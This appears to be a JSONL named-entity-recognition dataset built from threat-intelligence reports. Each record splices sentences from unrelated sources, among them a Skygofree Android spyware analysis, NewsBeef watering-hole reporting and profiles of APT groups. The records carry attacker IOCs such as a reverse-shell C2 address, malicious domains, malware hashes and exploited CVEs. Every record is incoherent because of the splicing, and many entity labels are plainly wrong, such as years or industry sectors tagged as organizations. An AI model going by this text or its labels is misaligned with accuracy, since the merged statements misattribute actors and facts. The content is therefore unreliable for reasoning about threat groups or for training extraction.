MuddyWater : Seedworm , TEMP.Zagros .", "spans": [{"start": 69, "end": 77, "label": "Organization"}, {"start": 196, "end": 206, "label": "Organization"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 220, "end": 231, "label": "Organization"}]} {"text": "You can find a full list with short descriptions in the Appendix . On December 25 , 2016 , the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations . MuddyWater is an Iranian threat group that has primarily targeted Middle Eastern nations , and has also targeted European and North American nations .", "spans": [{"start": 95, "end": 103, "label": "Organization"}, {"start": 271, "end": 281, "label": "Organization"}]} {"text": "Here are some of the most notable : \u2018 geofence \u2019 \u2013 this command adds a specified location to the implant \u2019 s internal database and when it matches a device \u2019 s current location the malware triggers and begins to record surrounding audio . These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to NewsBeef's targets . The group 's victims are mainly in the telecommunications , government ( IT services ) , and oil sectors .", "spans": [{"start": 365, "end": 375, "label": "Organization"}, {"start": 425, "end": 443, "label": "Organization"}, {"start": 446, "end": 456, "label": "Organization"}, {"start": 459, "end": 470, "label": "Organization"}, {"start": 479, "end": 490, "label": "Organization"}]} {"text": "\u201d social \u201d \u2013 this command that starts the \u2018 AndroidMDMSupport \u2019 service \u2013 this allows the files of any other installed application to be grabbed . 
However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com\u201d as well as attachments arriving through the Outlook desktop application . Activity from this group was previously linked to FIN7 , but the group is believed to be a distinct group possibly motivated by espionage .", "spans": [{"start": 157, "end": 166, "label": "Organization"}, {"start": 266, "end": 283, "label": "Malware"}, {"start": 408, "end": 412, "label": "Organization"}]} {"text": "The service name makes it clear that by applications the attackers mean MDM solutions that are business-specific tools . Interestingly , NewsBeef set up its server using the hosting provider Choopa , LLC , US\u201d , the same hosting provider that the group used in attacks over the summer of 2016 . Naikon is a threat group that has focused on targets around the South China Sea .", "spans": [{"start": 137, "end": 145, "label": "Organization"}, {"start": 191, "end": 197, "label": "System"}, {"start": 200, "end": 203, "label": "System"}, {"start": 206, "end": 209, "label": "System"}, {"start": 295, "end": 301, "label": "Organization"}]} {"text": "The operator can specify a path with the database of any targeted application and server-side PHP script name for uploading . NTG\u2019s IT focus and client list likely aided NewsBeef\u2019s delivery of malicious PowerShell-enabled Office documents and poisoned installers . 
The group has been attributed to the Chinese People \u2019s Liberation Army \u2019s ( PLA ) Chengdu Military Region Second Technical Reconnaissance Bureau ( Military Unit Cover Designator 78020 ) .", "spans": [{"start": 126, "end": 131, "label": "Organization"}, {"start": 170, "end": 180, "label": "Organization"}, {"start": 302, "end": 338, "label": "Organization"}, {"start": 341, "end": 344, "label": "Organization"}, {"start": 347, "end": 409, "label": "Organization"}, {"start": 412, "end": 448, "label": "Organization"}]} {"text": "Several hardcoded applications targeted by the MDM-grabbing command \u2018 wifi \u2019 \u2013 this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled . In other schemes , NewsBeef sent macro-enabled Office attachments from spoofed law firm identities or other relevant service providers to targets in SA . While Naikon shares some characteristics with APT30 , the two groups do not appear to be exact matches .", "spans": [{"start": 226, "end": 234, "label": "Organization"}, {"start": 367, "end": 373, "label": "Organization"}, {"start": 407, "end": 412, "label": "Organization"}]} {"text": "So , when a device connects to the established network , this process will be in silent and automatic mode . The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign . APT39 : Chafer .", "spans": [{"start": 197, "end": 204, "label": "Organization"}, {"start": 239, "end": 244, "label": "Organization"}, {"start": 247, "end": 253, "label": "Organization"}]} {"text": "This command is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle ( MitM ) attacks . Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to http://analytics-google.org:69/Check.aspx . 
APT39 is Oan Iranian cyber espionage group that has been active since at least 2014 .", "spans": [{"start": 191, "end": 199, "label": "Organization"}, {"start": 348, "end": 353, "label": "Organization"}]} {"text": "addWifiConfig method code fragments \u2018 camera \u2019 \u2013 this command records a video/capture a photo using the front-facing camera when someone next unlocks the device . For example , on a Saudi government website , the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site the packed and unpacked JavaScript is shown below . They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran 's national priorities .", "spans": [{"start": 213, "end": 221, "label": "Organization"}, {"start": 369, "end": 379, "label": "System"}]} {"text": "Some versions of the Skygofree feature the self-protection ability exclusively for Huawei devices . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d . APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity .", "spans": [{"start": 21, "end": 30, "label": "Malware"}, {"start": 83, "end": 89, "label": "Organization"}, {"start": 104, "end": 114, "label": "Malware"}, {"start": 115, "end": 121, "label": "Malware"}, {"start": 147, "end": 154, "label": "Malware"}, {"start": 329, "end": 334, "label": "Organization"}]} {"text": "There is a \u2018 protected apps \u2019 list in this brand \u2019 s smartphones , related to a battery-saving concept . A high volume of redirections from the compromised site continues into mid-January 2017 . 
APT41 has been active since as early as 2012 .", "spans": [{"start": 122, "end": 134, "label": "Organization"}, {"start": 195, "end": 200, "label": "Organization"}]} {"text": "Apps not selected as protected apps stop working once the screen is off and await re-activation , so the implant is able to determine that it is running on a Huawei device and add itself to this list . However , as this recent campaign indicates , the NewsBeef APT appears to have shifted its intrusion toolset away from BeEF and towards macro-enabled malicious Office documents , PowerSploit , and Pupy . The group has been observed targeting healthcare , telecom , technology , and video game industries in 14 countries .", "spans": [{"start": 158, "end": 164, "label": "Organization"}, {"start": 252, "end": 260, "label": "Organization"}, {"start": 362, "end": 378, "label": "System"}, {"start": 381, "end": 392, "label": "System"}, {"start": 399, "end": 403, "label": "System"}]} {"text": "Due to this feature , it is clear that the developers paid special attention to the work of the implant on Huawei devices . Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net . Axiom : Group72 .", "spans": [{"start": 107, "end": 113, "label": "Organization"}, {"start": 298, "end": 303, "label": "Organization"}, {"start": 306, "end": 313, "label": "Organization"}]} {"text": "Also , we found a debug version of the implant ( 70a937b2504b3ad6c623581424c7e53d ) that contains interesting constants , including the version of the spyware . Its attack activities can be traced back to April 2012 . 
Axiom is a cyber espionage group suspected to be associated with the Chinese government .", "spans": [{"start": 49, "end": 81, "label": "Indicator"}, {"start": 218, "end": 223, "label": "Organization"}]} {"text": "Debug BuildConfig with the version After a deep analysis of all discovered versions of Skygofree , we made an approximate timeline of the implant \u2019 s evolution . The OceanLotus reflects a very strong confrontational ability and willing to attack by keep evolving their techniques . It is responsible for the Operation SMN campaign .", "spans": [{"start": 87, "end": 96, "label": "Malware"}, {"start": 166, "end": 176, "label": "Organization"}]} {"text": "Mobile implant evolution timeline However , some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection . These APT attacks and adopting confrontation measures will exist for a long time . Though both this group and Winnti Group use the malware Winnti , the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting .", "spans": [{"start": 171, "end": 174, "label": "Organization"}, {"start": 187, "end": 218, "label": "Organization"}, {"start": 275, "end": 281, "label": "Organization"}, {"start": 304, "end": 310, "label": "Malware"}]} {"text": "Below is a list of the payloads used by the Skygofree implant in the second and third stages . OceanLotus\u2019 targets are global . Suckfly is a China based threat group that has been active since at least 2014 .", "spans": [{"start": 44, "end": 53, "label": "Malware"}, {"start": 95, "end": 106, "label": "Organization"}, {"start": 128, "end": 135, "label": "Organization"}]} {"text": "Reverse shell payload The reverse shell module is an external ELF file compiled by the attackers to run on Android . OceanLotus have been actively using since at least early 2018 . 
TA459 is a threat group believed to operate out of China that has targeted countries including Russia , Belarus , Mongolia , and others .", "spans": [{"start": 107, "end": 114, "label": "System"}, {"start": 117, "end": 127, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}]} {"text": "The choice of a particular payload is determined by the implant \u2019 s version , and it can be downloaded from the command and control ( C & C ) server soon after the implant starts , or after a specific command . OceanLotus malware family samples used no earlier than 2017 . TA505 is a financially motivated threat group that has been active since at least 2014 .", "spans": [{"start": 211, "end": 221, "label": "Organization"}, {"start": 273, "end": 278, "label": "Organization"}]} {"text": "In the most recent case , the choice of the payload zip file depends on the device process architecture . We identified two methods to deliver the KerrDown downloader to targets . The group is known for frequently changing malware and driving global trends in criminal malware distribution .", "spans": [{"start": 106, "end": 108, "label": "Organization"}, {"start": 147, "end": 155, "label": "Malware"}]} {"text": "For now , we observe only one payload version for following the ARM CPUs : arm64-v8a , armeabi , armeabi-v7a . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon . 
Magic Hound : Rocket Kitten , Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish , Newscaster , Cobalt Gypsy , APT35 .", "spans": [{"start": 64, "end": 67, "label": "System"}, {"start": 75, "end": 84, "label": "System"}, {"start": 87, "end": 94, "label": "System"}, {"start": 97, "end": 108, "label": "System"}, {"start": 144, "end": 152, "label": "Malware"}, {"start": 208, "end": 210, "label": "Organization"}, {"start": 299, "end": 310, "label": "Organization"}, {"start": 313, "end": 326, "label": "Organization"}, {"start": 329, "end": 351, "label": "Organization"}, {"start": 354, "end": 372, "label": "Organization"}, {"start": 375, "end": 400, "label": "Organization"}, {"start": 403, "end": 413, "label": "Organization"}, {"start": 416, "end": 428, "label": "Organization"}, {"start": 431, "end": 436, "label": "Organization"}]} {"text": "Note that in almost all cases , this payload file , contained in zip archives , is named \u2018 setting \u2019 or \u2018 setting.o \u2019 . While investigating KerrDown we found multiple RAR files containing a variant of the malware . Magic Hound is an Iranian-sponsored threat group operating primarily in the Middle East that dates back as early as 2014 .", "spans": [{"start": 91, "end": 98, "label": "Indicator"}, {"start": 106, "end": 115, "label": "Indicator"}, {"start": 140, "end": 148, "label": "Malware"}, {"start": 149, "end": 151, "label": "Organization"}, {"start": 215, "end": 226, "label": "Organization"}]} {"text": "The main purpose of this module is providing reverse shell features on the device by connecting with the C & C server \u2019 s socket . Therefore , it is clear that the OceanLotus group works during weekdays and takes a break during the weekends . The group behind the campaign has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . menuPass : Stone Panda , APT10 , Red Apollo , CVNX , HOGFISH . 
menuPass is a threat group that appears to originate from China and has been active since approximately 2009 .", "spans": [{"start": 164, "end": 174, "label": "Organization"}, {"start": 429, "end": 437, "label": "Organization"}, {"start": 440, "end": 451, "label": "Organization"}, {"start": 454, "end": 459, "label": "Organization"}, {"start": 462, "end": 472, "label": "Organization"}, {"start": 475, "end": 479, "label": "Organization"}, {"start": 482, "end": 489, "label": "Organization"}, {"start": 492, "end": 500, "label": "Organization"}]} {"text": "Reverse shell payload The payload is started by the main module with a specified host and port as a parameter that is hardcoded to \u2018 54.67.109.199 \u2019 and \u2018 30010 \u2019 in some versions : Alternatively , they could be hardcoded directly into the payload code : We also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path . The group was first revealed and named by SkyEye Team in May 2015 . The group has targeted healthcare , defense , aerospace , and government sectors , and has targeted Japanese victims since at least 2014 .", "spans": [{"start": 133, "end": 146, "label": "Indicator"}, {"start": 155, "end": 160, "label": "Indicator"}, {"start": 378, "end": 383, "label": "Organization"}]} {"text": "Equipped reverse shell payload with specific string After an in-depth look , we found that some versions of the reverse shell payload code share similarities with PRISM \u2013 a stealth reverse shell backdoor that is available on Github . OceanLotus's targets include China's maritime institutions , maritime construction , scientific research institutes and shipping enterprises . 
In 2016 and 2017 , the group targeted managed IT service providers , manufacturing and mining companies , and a university .", "spans": [{"start": 163, "end": 168, "label": "Malware"}, {"start": 225, "end": 231, "label": "Organization"}, {"start": 234, "end": 246, "label": "Organization"}, {"start": 271, "end": 292, "label": "Organization"}, {"start": 295, "end": 316, "label": "Organization"}, {"start": 319, "end": 349, "label": "Organization"}, {"start": 354, "end": 374, "label": "Organization"}]} {"text": "Reverse shell payload from update_dev.zip Exploit payload At the same time , we found an important payload binary that is trying to exploit several known vulnerabilities and escalate privileges . RedDrip Team (formerly SkyEye Team) has been to OceanLotus to keep track of high strength , groupactivity , found it in the near future to Indochinese Peninsula countries since 2019 On April 1 , 2019 , RedDrip discovered a Vietnamese file name Hop dong sungroup.rar in the process of daily monitoring the attack activities of the OceanLotus . Moafee is a threat group that appears to operate from the Guandong Province of China .", "spans": [{"start": 27, "end": 41, "label": "Indicator"}, {"start": 244, "end": 254, "label": "Organization"}, {"start": 398, "end": 405, "label": "Organization"}, {"start": 526, "end": 536, "label": "Organization"}, {"start": 539, "end": 545, "label": "Organization"}]} {"text": "According to several timestamps , this payload is used by implant versions created since 2016 . COCCOC is a Vietnam was founded in 2013 . Due to overlapping TTPs , including similar custom tools , Moafee is thought to have a direct or indirect relationship with the threat group DragonOK .", "spans": [{"start": 96, "end": 102, "label": "Organization"}, {"start": 197, "end": 203, "label": "Organization"}, {"start": 273, "end": 287, "label": "Organization"}]} {"text": "It can also be downloaded by a specific command . 
In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks . SilverTerrier is a Nigerian threat group that has been seen active since 2014 .", "spans": [{"start": 111, "end": 121, "label": "Organization"}, {"start": 249, "end": 254, "label": "Organization"}, {"start": 257, "end": 278, "label": "Organization"}, {"start": 281, "end": 300, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 313, "end": 326, "label": "Organization"}]} {"text": "The exploit payload contains following file components : Component name Description run_root_shell/arrs_put_user.o/arrs_put_user/poc Exploit ELF db Sqlite3 tool ELF device.db Sqlite3 database with supported devices and their constants needed for privilege escalation \u2018 device.db \u2019 is a database used by the exploit . Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file . SilverTerrier mainly targets organizations in high technology , higher education , and manufacturing .", "spans": [{"start": 84, "end": 132, "label": "Indicator"}, {"start": 165, "end": 174, "label": "Indicator"}, {"start": 269, "end": 278, "label": "Indicator"}, {"start": 345, "end": 352, "label": "Organization"}, {"start": 394, "end": 407, "label": "Organization"}]} {"text": "It contains two tables \u2013 \u2018 supported_devices \u2019 and \u2018 device_address \u2019 . these threat actors targeted a number of government agencies Threat actors targeted a number of government agencies in East Asia . 
Operation Soft Cell is a group that is reportedly affiliated with China and is likely state-sponsored .", "spans": [{"start": 133, "end": 146, "label": "Organization"}, {"start": 168, "end": 178, "label": "Organization"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 213, "end": 222, "label": "Organization"}]} {"text": "The first table contains 205 devices with some Linux properties ; the second contains the specific memory addresses associated with them that are needed for successful exploitation . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT . The group has operated since at least 2012 and has compromised high-profile telecommunications networks .", "spans": [{"start": 47, "end": 52, "label": "System"}, {"start": 183, "end": 192, "label": "Organization"}, {"start": 237, "end": 250, "label": "Vulnerability"}, {"start": 393, "end": 433, "label": "Organization"}]} {"text": "You can find a full list of targeted models in the Appendix . Maudi Surveillance Operation which was previously reported in 2013 . Sowbug is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia , particularly government entities , since at least 2015 .", "spans": [{"start": 62, "end": 67, "label": "Organization"}, {"start": 131, "end": 137, "label": "Organization"}, {"start": 265, "end": 284, "label": "Organization"}]} {"text": "Fragment of the database with targeted devices and specific memory addresses If the infected device is not listed in this database , the exploit tries to discover these addresses programmatically . specifically CVE-2018-0798 , before downloading subsequent payloads . 
Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan , the Philippines , and Hong Kong .", "spans": [{"start": 211, "end": 224, "label": "Vulnerability"}, {"start": 268, "end": 282, "label": "Organization"}]} {"text": "After downloading and unpacking , the main module executes the exploit binary file . The dropped PE file has the distinctive file name 8.t\u201d . Tropic Trooper focuses on targeting government , healthcare , transportation , and high-tech industries and has been active since 2011 .", "spans": [{"start": 97, "end": 99, "label": "System"}, {"start": 135, "end": 139, "label": "Malware"}, {"start": 142, "end": 156, "label": "Organization"}, {"start": 178, "end": 188, "label": "Organization"}]} {"text": "Once executed , the module attempts to get root privileges on the device by exploiting the following vulnerabilities : CVE-2013-2094 CVE-2013-2595 CVE-2013-6282 CVE-2014-3153 ( futex aka TowelRoot ) CVE-2015-3636 Exploitation process After an in-depth look , we found that the exploit payload code shares several similarities with the public project android-rooting-tools . The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above . 
Turla : Waterbug , WhiteBear , VENOMOUS BEAR , Snake , Krypton .", "spans": [{"start": 119, "end": 132, "label": "Vulnerability"}, {"start": 133, "end": 146, "label": "Vulnerability"}, {"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 177, "end": 182, "label": "Vulnerability"}, {"start": 187, "end": 196, "label": "Vulnerability"}, {"start": 199, "end": 212, "label": "Vulnerability"}, {"start": 438, "end": 446, "label": "Organization"}, {"start": 475, "end": 483, "label": "Organization"}, {"start": 505, "end": 510, "label": "Organization"}, {"start": 513, "end": 521, "label": "Organization"}, {"start": 524, "end": 533, "label": "Organization"}, {"start": 536, "end": 549, "label": "Organization"}, {"start": 552, "end": 557, "label": "Organization"}, {"start": 560, "end": 567, "label": "Organization"}]} {"text": "Decompiled exploit function code fragment run_with_mmap function from the android-rooting-tools project As can be seen from the comparison , there are similar strings and also a unique comment in Italian , so it looks like the attackers created this exploit payload based on android-rooting-tools project source code . These conflicts have even resulted in Haftar leading an attack on the capital city in April . 
Turla is a Russian-based threat group that has infected victims in over 45 countries , spanning a range of industries including government , embassies , military , education , research and pharmaceutical companies since 2004 .", "spans": [{"start": 74, "end": 95, "label": "System"}, {"start": 275, "end": 296, "label": "System"}, {"start": 357, "end": 363, "label": "Organization"}, {"start": 413, "end": 418, "label": "Organization"}, {"start": 541, "end": 551, "label": "Organization"}, {"start": 554, "end": 563, "label": "Organization"}, {"start": 566, "end": 574, "label": "Organization"}, {"start": 602, "end": 626, "label": "Organization"}]} {"text": "Busybox payload Busybox is public software that provides several Linux tools in a single ELF file . The attackers have targeted a large number of organizations globally since early 2017 . Heightened activity was seen in mid-2015 .", "spans": [{"start": 104, "end": 113, "label": "Organization"}]} {"text": "In earlier versions , it operated with shell commands like this : Stealing WhatsApp encryption key with Busybox Social payload Actually , this is not a standalone payload file \u2013 in all the observed versions its code was compiled with exploit payload in one file ( \u2018 poc_perm \u2019 , \u2018 arrs_put_user \u2019 , \u2018 arrs_put_user.o \u2019 ) . Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . 
Turla is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware .", "spans": [{"start": 104, "end": 126, "label": "Malware"}, {"start": 323, "end": 332, "label": "Organization"}, {"start": 411, "end": 420, "label": "Organization"}, {"start": 450, "end": 455, "label": "Organization"}, {"start": 526, "end": 551, "label": "System"}, {"start": 556, "end": 563, "label": "Malware"}]} {"text": "This is due to the fact that the implant needs to escalate privileges before performing social payload actions . Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities . Turla \u2019s espionage platform is mainly used against Windows machines , but has also been seen used against macOS and Linux machines .", "spans": [{"start": 113, "end": 120, "label": "Organization"}, {"start": 167, "end": 178, "label": "Organization"}, {"start": 181, "end": 188, "label": "Organization"}, {"start": 191, "end": 208, "label": "Organization"}, {"start": 213, "end": 222, "label": "Organization"}, {"start": 225, "end": 251, "label": "Organization"}, {"start": 254, "end": 262, "label": "Organization"}, {"start": 267, "end": 288, "label": "Organization"}, {"start": 291, "end": 301, "label": "Organization"}, {"start": 304, "end": 317, "label": "Organization"}, {"start": 320, "end": 336, "label": "Organization"}, {"start": 339, "end": 359, "label": "Organization"}, {"start": 362, "end": 383, "label": "Organization"}, {"start": 392, "end": 409, "label": "Organization"}, {"start": 422, "end": 438, "label": "Organization"}, {"start": 441, "end": 446, "label": "Organization"}, {"start": 492, "end": 499, "label": "System"}, {"start": 547, "end": 552, "label": "System"}, {"start": 557, "end": 
562, "label": "System"}]} {"text": "This payload is also used by the earlier versions of the implant . Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected . Winnti Group : Blackfly .", "spans": [{"start": 67, "end": 78, "label": "Organization"}, {"start": 199, "end": 211, "label": "Organization"}, {"start": 214, "end": 222, "label": "Organization"}]} {"text": "It has similar functionality to the \u2018 AndroidMDMSupport \u2019 command from the current versions \u2013 stealing data belonging to other installed applications . Operation Parliament appears to be another symptom of escalating tensions in the Middle East region . Winnti Group is a threat group with Chinese origins that has been active since at least 2010 .", "spans": [{"start": 152, "end": 172, "label": "Organization"}, {"start": 254, "end": 266, "label": "Organization"}]} {"text": "The payload will execute shell code to steal data from various applications . The attackers have taken great care to stay under the radar , imitating another attack group in the region . The group has heavily targeted the gaming industry , but it has also expanded the scope of its targeting .", "spans": [{"start": 82, "end": 91, "label": "Organization"}]} {"text": "The example below steals Facebook data : All the other hardcoded applications targeted by the payload : Package name Name jp.naver.line.android LINE : Free Calls & Messages com.facebook.orca Facebook messenger com.facebook.katana Facebook com.whatsapp WhatsApp com.viber.voip Viber Parser payload Upon receiving a specific command , the implant can download a special payload to grab sensitive information from external applications . With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East . 
Some reporting suggests a number of other groups , including Axiom , APT17 , and Ke3chang , are closely linked to Winnti Group .", "spans": [{"start": 25, "end": 33, "label": "System"}, {"start": 122, "end": 143, "label": "Indicator"}, {"start": 144, "end": 172, "label": "System"}, {"start": 173, "end": 190, "label": "Indicator"}, {"start": 191, "end": 209, "label": "System"}, {"start": 210, "end": 229, "label": "Indicator"}, {"start": 230, "end": 238, "label": "System"}, {"start": 239, "end": 251, "label": "Indicator"}, {"start": 252, "end": 260, "label": "System"}, {"start": 261, "end": 275, "label": "Indicator"}, {"start": 276, "end": 281, "label": "System"}, {"start": 497, "end": 510, "label": "Organization"}, {"start": 704, "end": 709, "label": "Organization"}, {"start": 712, "end": 717, "label": "Organization"}, {"start": 724, "end": 732, "label": "Organization"}, {"start": 757, "end": 769, "label": "Organization"}]} {"text": "The case where we observed this involved WhatsApp . The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware . Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists , activists , and dissidents since at least 2012 .", "spans": [{"start": 41, "end": 49, "label": "System"}, {"start": 56, "end": 63, "label": "Malware"}, {"start": 91, "end": 101, "label": "Malware"}, {"start": 188, "end": 202, "label": "Organization"}]} {"text": "In the examined version , it was downloaded from : hxxp : //url [ . The malware starts communicating with the C&C server by sending basic information about the infected machine . 
Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates ( UAE ) government , but that has not been confirmed .", "spans": [{"start": 51, "end": 67, "label": "Indicator"}, {"start": 72, "end": 79, "label": "Malware"}, {"start": 87, "end": 113, "label": "Malware"}, {"start": 261, "end": 300, "label": "Organization"}]} {"text": "] plus/Updates/tt/parser.apk The payload can be a .dex or .apk file which is a Java-compiled Android executable . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . Stolen Pencil is a threat group likely originating from DPRK that has been active since at least May 2018 .", "spans": [{"start": 93, "end": 100, "label": "System"}, {"start": 118, "end": 125, "label": "Malware"}, {"start": 136, "end": 144, "label": "Malware"}, {"start": 154, "end": 168, "label": "System"}, {"start": 186, "end": 195, "label": "Organization"}, {"start": 284, "end": 297, "label": "Organization"}]} {"text": "After downloading , it will be loaded by the main module via DexClassLoader api : As mentioned , we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way . What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants\u2019 rights in Qatar and Nepal . 
The group appears to have targeted academic institutions , but its motives remain unclear .", "spans": [{"start": 148, "end": 166, "label": "System"}]} {"text": "The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen , so it waits for the targeted application to be launched and then parses all nodes to find text messages : Note that the implant needs special permission to use the Accessibility Service API , but there is a command that performs a request with a phishing text displayed to the user to obtain such permission . We refer to this campaign and the associated actor as Operation Kingphish Malik\u201d , in one of its written forms in Arabic , translates to King\u201d . Strider : ProjectSauron . Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia , China , Sweden , Belgium , Iran , and Rwanda .", "spans": [{"start": 21, "end": 28, "label": "System"}, {"start": 487, "end": 506, "label": "Organization"}, {"start": 578, "end": 585, "label": "Organization"}, {"start": 588, "end": 603, "label": "Organization"}, {"start": 604, "end": 611, "label": "Organization"}]} {"text": "Windows We have found multiple components that form an entire spyware system for the Windows platform . It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers\u2019 rights in Qatar . 
Putter Panda : APT2 , MSUpdater .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 85, "end": 92, "label": "System"}, {"start": 304, "end": 313, "label": "Organization"}, {"start": 448, "end": 460, "label": "Organization"}, {"start": 463, "end": 467, "label": "Organization"}, {"start": 470, "end": 479, "label": "Organization"}]} {"text": "Name MD5 Purpose msconf.exe 55fb01048b6287eadcbd9a0f86d21adf Main module , reverse shell network.exe f673bb1d519138ced7659484c0b66c5b Sending exfiltrated data system.exe d3baa45ed342fbc5a56d974d36d5f73f Surrounding sound recording by mic update.exe 395f9f87df728134b5e3c1ca4d48e9fa Keylogging wow.exe It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA \u2019s 3rd General Staff Department ( GSD ) .", "spans": [{"start": 17, "end": 27, "label": "Indicator"}, {"start": 28, "end": 60, "label": "Indicator"}, {"start": 89, "end": 100, "label": "Indicator"}, {"start": 101, "end": 133, "label": "Indicator"}, {"start": 159, "end": 169, "label": "Indicator"}, {"start": 170, "end": 202, "label": "Indicator"}, {"start": 238, "end": 248, "label": "Indicator"}, {"start": 249, "end": 281, "label": "Indicator"}, {"start": 293, "end": 300, "label": "Indicator"}, {"start": 321, "end": 330, "label": "Organization"}, {"start": 517, "end": 529, "label": "Organization"}, {"start": 584, "end": 656, "label": "Organization"}, {"start": 659, "end": 662, "label": "Organization"}]} {"text": "16311b16fd48c1c87c6476a455093e7a Screenshot capturing skype_sync2.exe 6bcc3559d7405f25ea403317353d905f Skype call recording to MP3 All modules , except skype_sync2.exe , are written in Python and packed to binary files via the Py2exe tool . 
In the course of this email correspondence , the attacker \u2014 Safeena\u201d \u2014 then sent what appeared to be invitations to access several documents on Google Drive . Rancor is a threat group that has led targeted campaigns against the South East Asia region .", "spans": [{"start": 0, "end": 32, "label": "Indicator"}, {"start": 54, "end": 69, "label": "Indicator"}, {"start": 70, "end": 102, "label": "Indicator"}, {"start": 103, "end": 108, "label": "System"}, {"start": 152, "end": 167, "label": "Indicator"}, {"start": 185, "end": 191, "label": "System"}, {"start": 227, "end": 233, "label": "System"}, {"start": 290, "end": 298, "label": "Organization"}, {"start": 400, "end": 406, "label": "Organization"}]} {"text": "This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries . The attackers were meticulous in making their phishing page as credible as possible . Rancor uses politically-motivated lures to entice victims to open malicious documents .", "spans": [{"start": 31, "end": 37, "label": "System"}, {"start": 58, "end": 65, "label": "System"}, {"start": 100, "end": 106, "label": "System"}, {"start": 122, "end": 131, "label": "Organization"}, {"start": 204, "end": 210, "label": "Organization"}, {"start": 216, "end": 243, "label": "System"}]} {"text": "msconf.exe is the main module that provides control of the implant and reverse shell feature . Among the targets of this campaign is the International Trade Union Confederation (ITUC) . 
RTM is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 151, "end": 176, "label": "Organization"}, {"start": 186, "end": 189, "label": "Organization"}]} {"text": "It opens a socket on the victim \u2019 s machine and connects with a server-side component of the implant located at 54.67.109.199:6500 . Both in the attacks against ITUC and in other occasions , Operation Kingphish approached selected targets over social media , prominently Facebook , and engaged in chat conversations with them on and off , sometimes over a period of several months . The group uses a Trojan by the same name ( RTM ) .", "spans": [{"start": 112, "end": 130, "label": "Indicator"}, {"start": 161, "end": 165, "label": "Organization"}, {"start": 191, "end": 210, "label": "Organization"}, {"start": 244, "end": 256, "label": "System"}, {"start": 259, "end": 279, "label": "System"}, {"start": 400, "end": 406, "label": "Malware"}, {"start": 426, "end": 429, "label": "Organization"}]} {"text": "Before connecting with the socket , it creates a malware environment in \u2018 APPDATA/myupd \u2019 and creates a sqlite3 database there \u2013 \u2018 myupd_tmp\\\\mng.db \u2019 : CREATE TABLE MANAGE ( ID INT PRIMARY KEY NOT NULL , Send INT NOT NULL , Keylogg INT NOT NULL , Screenshot INT NOT NULL , Audio INT NOT NULL ) ; INSERT INTO MANAGE ( ID , Send , Keylogg , Screenshot , Audio This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar . 
